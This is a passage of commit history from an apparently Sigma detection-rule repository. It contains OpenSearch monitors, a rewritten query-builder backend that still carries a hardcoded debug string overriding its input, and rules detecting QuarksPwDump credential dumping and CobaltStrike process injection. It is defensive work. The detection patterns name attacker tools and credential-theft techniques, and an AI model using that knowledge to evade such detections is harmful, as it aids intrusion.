"ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} +{"type": "monitor", "name": "QuarksPwDump Clearing Access History", "description": "Detects QuarksPwDump clearing access history in hive", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {" winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM* "}}, {"match": {" winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Credential Access", "T1003", "T1003.002"], "triggers": [{"name": "generated-trigger", "severity": "1", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "threat": [{"tactic": {"id": "TA0006", "reference": "https://attack.mitre.org/tactics/TA0006", "name": "Credential Access"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1003", "name": "OS Credential Dumping", "reference": "https://attack.mitre.org/techniques/T1003"}]}]}} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 0f6ae3b0..f26b75b2 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -159,63 +159,62 @@ class OpenSearchBackend(object): Only supports must and should clauses. ''' def build_query(self, translation): - translation = "(winlog.channel:\"System\" OR winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" # translation = "(winlog.channel:\"System\"" - parsedTranslation = translation.strip("()").split() + parsedTranslation = translation.strip("()").split("OR") if len(parsedTranslation) == 0: return {} - - boolMappings = {"and": "must", "or": "should"} + clauses = [] - currMatches = [] - - if len(parsedTranslation) == 1 or (parsedTranslation[1].lower() == "or" and len(parsedTranslation) > 3 and parsedTranslation[3].lower() == "and"): - defaultClause = "must" - else: - defaultClause = boolMappings[parsedTranslation[1].lower()] - - currQuery = { - "bool": { - defaultClause : currMatches - } - } - prevOp = "and" if defaultClause == "must" else "or" - for index in range(0, len(parsedTranslation)-1, 2): - element = parsedTranslation[index] - nextElement = parsedTranslation[index+1].lower() + translateIndex = 0 + while translateIndex < len(parsedTranslation): + expression = parsedTranslation[translateIndex] + currMatches = [] + clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements - currMatches.append({ - "match": { - element.split(":")[0]: element.split(":")[1] - } - }) + parsedExpression = expression.split() - if nextElement != prevOp: - clauses.append(currQuery) - currMatches = [] + # Statement was joined by "or" + if len(parsedExpression) == 1: + counter = 1 + tempIndex = translateIndex + while tempIndex+1 < len(parsedTranslation) and len(parsedTranslation[tempIndex+1].split()) == 1: + tempIndex += 1 + counter += 1 - if nextElement == "or" and index+3 < len(parsedTranslation) and parsedTranslation[index+3].lower() == "or": - nextClause = "should" - else: - nextClause = "must" + # If there's more than one, use "should" clase instead of "must" + if counter > 1: + clause = "should" + parsedExpression = [] - currQuery = { - "bool": { - nextClause : currMatches + # Rebuild parsed expression to join statements together and fast forward the translate index + for i in range(counter): + parsedExpression.append(parsedTranslation[translateIndex+i]) + parsedExpression.append(None) + + translateIndex = tempIndex + + # Iterate through each statement and join match statements into array + for expressionIndex in range(0, len(parsedExpression), 2): + element = parsedExpression[expressionIndex] + currMatches.append({ + "match": { + element.split(":")[0]: element.split(":")[1] } + }) + + currQuery = { + "bool": { + clause: currMatches } - - prevOp = nextElement - - currMatches.append({ - "match": { - parsedTranslation[-1].split(":")[0]: parsedTranslation[-1].split(":")[1] } - }) - clauses.append(currQuery) + clauses.append(currQuery) + translateIndex += 1 + + # If only one type of clause, don't use nested bool object if len(clauses) > 1: return { "bool": { From e1ef8f40559a7c54f94aa1065893fdfa79fd61fa Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Fri, 13 Aug 2021 10:28:34 +0200 Subject: [PATCH 0320/1367] fix: Rewrite another message rule Rewrites another message rule. This one is a bit more complex since a bitmap is used and the string representation is not available. --- .../win_alert_enable_weak_encryption.yml | 70 ++++++++++++++++--- 1 file changed, 61 insertions(+), 9 deletions(-) diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml index c0904ce5..90af9166 100644 --- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml +++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml @@ -17,15 +17,67 @@ logsource: detection: selection: EventID: 4738 - keywords: - Message|contains: - - 'DES' - - 'Preauth' - - 'Encrypted' - filters: - Message|contains: - - 'Enabled' - condition: selection and keywords and filters + olduac_des: # 0x8000 + OldUacValue|endswith: + - 8??? + - 9??? + - A??? + - B??? + - C??? + - D??? + - E??? + - F??? + newuac_des: + NewUacValue|endswith: + - 8??? + - 9??? + - A??? + - B??? + - C??? + - D??? + - E??? + - F??? + olduac_preauth: # 0x10000 + OldUacValue|endswith: + - 1???? + - 3???? + - 5???? + - 7???? + - 9???? + - B???? + - D???? + - F???? + newuac_preauth: + NewUacValue|endswith: + - 1???? + - 3???? + - 5???? + - 7???? + - 9???? + - B???? + - D???? + - F???? + olduac_encrypted: # 0x800 + OldUacValue|endswith: + - 8?? + - 9?? + - A?? + - B?? + - C?? + - D?? + - E?? + - F?? + newuac_encrypted: + NewUacValue|endswith: + - 8?? + - 9?? + - A?? + - B?? + - C?? + - D?? + - E?? + - F?? + condition: selection and ((newuac_des and not olduac_des) or (newuac_preauth and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted)) falsepositives: - Unknown level: high From 5e42187062a92d0ff9012ecbeac77288f89e2ea4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 11:01:33 +0200 Subject: [PATCH 0321/1367] remove change for Message rule --- .../builtin/win_alert_active_directory_user_control.yml | 8 +++++--- .../windows/builtin/win_alert_enable_weak_encryption.yml | 4 ++-- rules/windows/builtin/win_vul_cve_2020_0688.yml | 5 +++-- 3 files changed, 10 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/win_alert_active_directory_user_control.yml b/rules/windows/builtin/win_alert_active_directory_user_control.yml index 8825ab11..078f02eb 100644 --- a/rules/windows/builtin/win_alert_active_directory_user_control.yml +++ b/rules/windows/builtin/win_alert_active_directory_user_control.yml @@ -8,7 +8,7 @@ references: - https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ author: '@neu5ron' date: 2017/07/30 -modified: 2021/08/09 +modified: 2020/08/23 logsource: product: windows service: security @@ -16,8 +16,10 @@ logsource: detection: selection: EventID: 4704 - Message|contains: 'SeEnableDelegationPrivilege' - condition: selection + keywords: + Message|contains: + - 'SeEnableDelegationPrivilege' + condition: all of them falsepositives: - Unknown level: high diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml index abc236e0..c0904ce5 100644 --- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml +++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml @@ -6,7 +6,6 @@ references: - https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ author: '@neu5ron' date: 2017/07/30 -modified: 2021/08/09 tags: - attack.defense_evasion - attack.t1089 # an old one @@ -24,7 +23,8 @@ detection: - 'Preauth' - 'Encrypted' filters: - Message|contains: 'Enabled' + Message|contains: + - 'Enabled' condition: selection and keywords and filters falsepositives: - Unknown diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index b34e251e..51a0902c 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -7,7 +7,7 @@ references: - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ author: Florian Roth, wagga date: 2020/02/29 -modified: 2021/08/09 +modified: 2021/06/27 tags: - attack.initial_access - attack.t1190 @@ -20,7 +20,8 @@ detection: Source: MSExchange Control Panel Level: Error selection2: - Message|contains: '&__VIEWSTATE=' + Message|contains: + - '&__VIEWSTATE=' condition: selection1 and selection2 falsepositives: - Unknown From 246ba0c17f631153a5f53490fde208d07dc935cb Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 13 Aug 2021 15:31:12 +0200 Subject: [PATCH 0322/1367] generalise amsi bypass rule to CobaltStrike BOF injection pattern generalise to CobaltStrike BOF injection pattern --- ...yml => sysmon_cobaltstrike_bof_injection_pattern.yml} | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename rules/windows/process_access/{sysmon_injected_amsi_bypass.yml => sysmon_cobaltstrike_bof_injection_pattern.yml} (70%) diff --git a/rules/windows/process_access/sysmon_injected_amsi_bypass.yml b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml similarity index 70% rename from rules/windows/process_access/sysmon_injected_amsi_bypass.yml rename to rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml index d8e898ae..424ca2bc 100644 --- a/rules/windows/process_access/sysmon_injected_amsi_bypass.yml +++ b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml @@ -1,8 +1,9 @@ -title: CobaltStrike BOF Injecting AMSI Bypass +title: CobaltStrike BOF Injection Pattern id: 09706624-b7f6-455d-9d02-adee024cee1d -description: Detects the usage of a CobaltStrike BOF which injects an AMSI Bypass +description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes references: - https://github.com/boku7/injectAmsiBypass + - https://github.com/boku7/spawn status: experimental author: Christian Burkard date: 2021/08/04 @@ -12,7 +13,9 @@ logsource: detection: selection: CallTrace|re: '^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' - GrantedAccess: '0x1028' + GrantedAccess: + - '0x1028' + - '0x1fffff' condition: selection falsepositives: - unkown From c0aa9696ddb1ef6b3a821b931a16ed51c0fde603 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 15:40:03 +0200 Subject: [PATCH 0323/1367] move aws rules --- rules/cloud/{ => aws}/aws_cloudtrail_disable_logging.yml | 0 rules/cloud/{ => aws}/aws_config_disable_recording.yml | 0 rules/cloud/{ => aws}/aws_ec2_disable_encryption.yml | 0 rules/cloud/{ => aws}/aws_ec2_download_userdata.yml | 0 rules/cloud/{ => aws}/aws_ec2_startup_script_change.yml | 0 rules/cloud/{ => aws}/aws_ec2_vm_export_failure.yml | 0 rules/cloud/{ => aws}/aws_elasticache_security_group_created.yml | 0 .../aws_elasticache_security_group_modified_or_deleted.yml | 0 rules/cloud/{ => aws}/aws_enum_listing.yml | 0 rules/cloud/{ => aws}/aws_guardduty_disruption.yml | 0 rules/cloud/{ => aws}/aws_iam_backdoor_users_keys.yml | 0 rules/cloud/{ => aws}/aws_macic_evasion.yml | 0 rules/cloud/{ => aws}/aws_rds_change_master_password.yml | 0 rules/cloud/{ => aws}/aws_rds_public_db_restore.yml | 0 rules/cloud/{ => aws}/aws_root_account_usage.yml | 0 .../{ => aws}/aws_route_53_domain_transferred_lock_disabled.yml | 0 .../aws_route_53_domain_transferred_to_another_account.yml | 0 rules/cloud/{ => aws}/aws_s3_data_management_tampering.yml | 0 rules/cloud/{ => aws}/aws_securityhub_finding_evasion.yml | 0 rules/cloud/{ => aws}/aws_snapshot_backup_exfiltration.yml | 0 rules/cloud/{ => aws}/aws_sts_assumedrole_misuse.yml | 0 rules/cloud/{ => aws}/aws_sts_getsessiontoken_misuse.yml | 0 rules/cloud/{ => aws}/aws_update_login_profile.yml | 0 23 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => aws}/aws_cloudtrail_disable_logging.yml (100%) rename rules/cloud/{ => aws}/aws_config_disable_recording.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_disable_encryption.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_download_userdata.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_startup_script_change.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_vm_export_failure.yml (100%) rename rules/cloud/{ => aws}/aws_elasticache_security_group_created.yml (100%) rename rules/cloud/{ => aws}/aws_elasticache_security_group_modified_or_deleted.yml (100%) rename rules/cloud/{ => aws}/aws_enum_listing.yml (100%) rename rules/cloud/{ => aws}/aws_guardduty_disruption.yml (100%) rename rules/cloud/{ => aws}/aws_iam_backdoor_users_keys.yml (100%) rename rules/cloud/{ => aws}/aws_macic_evasion.yml (100%) rename rules/cloud/{ => aws}/aws_rds_change_master_password.yml (100%) rename rules/cloud/{ => aws}/aws_rds_public_db_restore.yml (100%) rename rules/cloud/{ => aws}/aws_root_account_usage.yml (100%) rename rules/cloud/{ => aws}/aws_route_53_domain_transferred_lock_disabled.yml (100%) rename rules/cloud/{ => aws}/aws_route_53_domain_transferred_to_another_account.yml (100%) rename rules/cloud/{ => aws}/aws_s3_data_management_tampering.yml (100%) rename rules/cloud/{ => aws}/aws_securityhub_finding_evasion.yml (100%) rename rules/cloud/{ => aws}/aws_snapshot_backup_exfiltration.yml (100%) rename rules/cloud/{ => aws}/aws_sts_assumedrole_misuse.yml (100%) rename rules/cloud/{ => aws}/aws_sts_getsessiontoken_misuse.yml (100%) rename rules/cloud/{ => aws}/aws_update_login_profile.yml (100%) diff --git a/rules/cloud/aws_cloudtrail_disable_logging.yml b/rules/cloud/aws/aws_cloudtrail_disable_logging.yml similarity index 100% rename from rules/cloud/aws_cloudtrail_disable_logging.yml rename to rules/cloud/aws/aws_cloudtrail_disable_logging.yml diff --git a/rules/cloud/aws_config_disable_recording.yml b/rules/cloud/aws/aws_config_disable_recording.yml similarity index 100% rename from rules/cloud/aws_config_disable_recording.yml rename to rules/cloud/aws/aws_config_disable_recording.yml diff --git a/rules/cloud/aws_ec2_disable_encryption.yml b/rules/cloud/aws/aws_ec2_disable_encryption.yml similarity index 100% rename from rules/cloud/aws_ec2_disable_encryption.yml rename to rules/cloud/aws/aws_ec2_disable_encryption.yml diff --git a/rules/cloud/aws_ec2_download_userdata.yml b/rules/cloud/aws/aws_ec2_download_userdata.yml similarity index 100% rename from rules/cloud/aws_ec2_download_userdata.yml rename to rules/cloud/aws/aws_ec2_download_userdata.yml diff --git a/rules/cloud/aws_ec2_startup_script_change.yml b/rules/cloud/aws/aws_ec2_startup_script_change.yml similarity index 100% rename from rules/cloud/aws_ec2_startup_script_change.yml rename to rules/cloud/aws/aws_ec2_startup_script_change.yml diff --git a/rules/cloud/aws_ec2_vm_export_failure.yml b/rules/cloud/aws/aws_ec2_vm_export_failure.yml similarity index 100% rename from rules/cloud/aws_ec2_vm_export_failure.yml rename to rules/cloud/aws/aws_ec2_vm_export_failure.yml diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws/aws_elasticache_security_group_created.yml similarity index 100% rename from rules/cloud/aws_elasticache_security_group_created.yml rename to rules/cloud/aws/aws_elasticache_security_group_created.yml diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml similarity index 100% rename from rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml rename to rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml diff --git a/rules/cloud/aws_enum_listing.yml b/rules/cloud/aws/aws_enum_listing.yml similarity index 100% rename from rules/cloud/aws_enum_listing.yml rename to rules/cloud/aws/aws_enum_listing.yml diff --git a/rules/cloud/aws_guardduty_disruption.yml b/rules/cloud/aws/aws_guardduty_disruption.yml similarity index 100% rename from rules/cloud/aws_guardduty_disruption.yml rename to rules/cloud/aws/aws_guardduty_disruption.yml diff --git a/rules/cloud/aws_iam_backdoor_users_keys.yml b/rules/cloud/aws/aws_iam_backdoor_users_keys.yml similarity index 100% rename from rules/cloud/aws_iam_backdoor_users_keys.yml rename to rules/cloud/aws/aws_iam_backdoor_users_keys.yml diff --git a/rules/cloud/aws_macic_evasion.yml b/rules/cloud/aws/aws_macic_evasion.yml similarity index 100% rename from rules/cloud/aws_macic_evasion.yml rename to rules/cloud/aws/aws_macic_evasion.yml diff --git a/rules/cloud/aws_rds_change_master_password.yml b/rules/cloud/aws/aws_rds_change_master_password.yml similarity index 100% rename from rules/cloud/aws_rds_change_master_password.yml rename to rules/cloud/aws/aws_rds_change_master_password.yml diff --git a/rules/cloud/aws_rds_public_db_restore.yml b/rules/cloud/aws/aws_rds_public_db_restore.yml similarity index 100% rename from rules/cloud/aws_rds_public_db_restore.yml rename to rules/cloud/aws/aws_rds_public_db_restore.yml diff --git a/rules/cloud/aws_root_account_usage.yml b/rules/cloud/aws/aws_root_account_usage.yml similarity index 100% rename from rules/cloud/aws_root_account_usage.yml rename to rules/cloud/aws/aws_root_account_usage.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml similarity index 100% rename from rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml rename to rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml similarity index 100% rename from rules/cloud/aws_route_53_domain_transferred_to_another_account.yml rename to rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws/aws_s3_data_management_tampering.yml similarity index 100% rename from rules/cloud/aws_s3_data_management_tampering.yml rename to rules/cloud/aws/aws_s3_data_management_tampering.yml diff --git a/rules/cloud/aws_securityhub_finding_evasion.yml b/rules/cloud/aws/aws_securityhub_finding_evasion.yml similarity index 100% rename from rules/cloud/aws_securityhub_finding_evasion.yml rename to rules/cloud/aws/aws_securityhub_finding_evasion.yml diff --git a/rules/cloud/aws_snapshot_backup_exfiltration.yml b/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml similarity index 100% rename from rules/cloud/aws_snapshot_backup_exfiltration.yml rename to rules/cloud/aws/aws_snapshot_backup_exfiltration.yml diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws/aws_sts_assumedrole_misuse.yml similarity index 100% rename from rules/cloud/aws_sts_assumedrole_misuse.yml rename to rules/cloud/aws/aws_sts_assumedrole_misuse.yml diff --git a/rules/cloud/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml similarity index 100% rename from rules/cloud/aws_sts_getsessiontoken_misuse.yml rename to rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml diff --git a/rules/cloud/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml similarity index 100% rename from rules/cloud/aws_update_login_profile.yml rename to rules/cloud/aws/aws_update_login_profile.yml From 1a1221d71ce7ebe5838ad3ff19f4e339c79a8fdc Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 15:42:54 +0200 Subject: [PATCH 0324/1367] move azure rules --- .../{ => azure}/azure_container_registry_created_or_deleted.yml | 0 rules/cloud/{ => azure}/azure_dns_zone_modified_or_deleted.yml | 0 rules/cloud/{ => azure}/azure_firewall_modified_or_deleted.yml | 0 .../azure_firewall_rule_collection_modified_or_deleted.yml | 0 .../{ => azure}/azure_kubernetes_cluster_created_or_deleted.yml | 0 rules/cloud/{ => azure}/azure_kubernetes_events_deleted.yml | 0 .../cloud/{ => azure}/azure_kubernetes_network_policy_change.yml | 0 rules/cloud/{ => azure}/azure_kubernetes_pods_deleted.yml | 0 rules/cloud/{ => azure}/azure_kubernetes_role_access.yml | 0 .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 0 .../azure_kubernetes_secret_or_config_object_access.yml | 0 .../azure_kubernetes_service_account_modified_or_deleted.yml | 0 .../azure_network_firewall_rule_modified_or_deleted.yml | 0 .../{ => azure}/azure_network_p2s_vpn_modified_or_deleted.yml | 0 .../{ => azure}/azure_network_security_modified_or_deleted.yml | 0 .../azure_network_virtual_device_modified_or_deleted.yml | 0 .../{ => azure}/azure_virtual_network_modified_or_deleted.yml | 0 .../{ => azure}/azure_vpn_connection_modified_or_deleted.yml | 0 18 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => azure}/azure_container_registry_created_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_dns_zone_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_firewall_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_firewall_rule_collection_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_cluster_created_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_events_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_network_policy_change.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_pods_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_role_access.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_rolebinding_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_secret_or_config_object_access.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_service_account_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_firewall_rule_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_p2s_vpn_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_security_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_virtual_device_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_virtual_network_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_vpn_connection_modified_or_deleted.yml (100%) diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure/azure_container_registry_created_or_deleted.yml similarity index 100% rename from rules/cloud/azure_container_registry_created_or_deleted.yml rename to rules/cloud/azure/azure_container_registry_created_or_deleted.yml diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_dns_zone_modified_or_deleted.yml rename to rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml diff --git a/rules/cloud/azure_firewall_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_firewall_modified_or_deleted.yml rename to rules/cloud/azure/azure_firewall_modified_or_deleted.yml diff --git a/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml rename to rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml rename to rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure/azure_kubernetes_events_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_events_deleted.yml rename to rules/cloud/azure/azure_kubernetes_events_deleted.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure/azure_kubernetes_network_policy_change.yml similarity index 100% rename from rules/cloud/azure_kubernetes_network_policy_change.yml rename to rules/cloud/azure/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_pods_deleted.yml rename to rules/cloud/azure/azure_kubernetes_pods_deleted.yml diff --git a/rules/cloud/azure_kubernetes_role_access.yml b/rules/cloud/azure/azure_kubernetes_role_access.yml similarity index 100% rename from rules/cloud/azure_kubernetes_role_access.yml rename to rules/cloud/azure/azure_kubernetes_role_access.yml diff --git a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml rename to rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml similarity index 100% rename from rules/cloud/azure_kubernetes_secret_or_config_object_access.yml rename to rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml rename to rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure/azure_network_security_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_security_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_security_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_virtual_device_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_virtual_network_modified_or_deleted.yml rename to rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_vpn_connection_modified_or_deleted.yml rename to rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml From 4c59ee83d591fc7cf5b97749713d9973e070b471 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 15:43:46 +0200 Subject: [PATCH 0325/1367] move gcp rules --- rules/cloud/{ => gcp}/gcp_kubernetes_rolebinding.yml | 0 .../{ => gcp}/gcp_kubernetes_secrets_modified_or_deleted.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => gcp}/gcp_kubernetes_rolebinding.yml (100%) rename rules/cloud/{ => gcp}/gcp_kubernetes_secrets_modified_or_deleted.yml (100%) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml similarity index 100% rename from rules/cloud/gcp_kubernetes_rolebinding.yml rename to rules/cloud/gcp/gcp_kubernetes_rolebinding.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml similarity index 100% rename from rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml rename to rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml From 50f02ed957204c6e47730e442ef89247d6eeea18 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 15:45:28 +0200 Subject: [PATCH 0326/1367] move microsoft365 rules --- .../cloud/{ => m365}/microsoft365_impossible_travel_activity.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => m365}/microsoft365_impossible_travel_activity.yml (100%) diff --git a/rules/cloud/microsoft365_impossible_travel_activity.yml b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml similarity index 100% rename from rules/cloud/microsoft365_impossible_travel_activity.yml rename to rules/cloud/m365/microsoft365_impossible_travel_activity.yml From ce326cb9030bd533b9d27f508c2a470e1dbfe04e Mon Sep 17 00:00:00 2001 From: Max 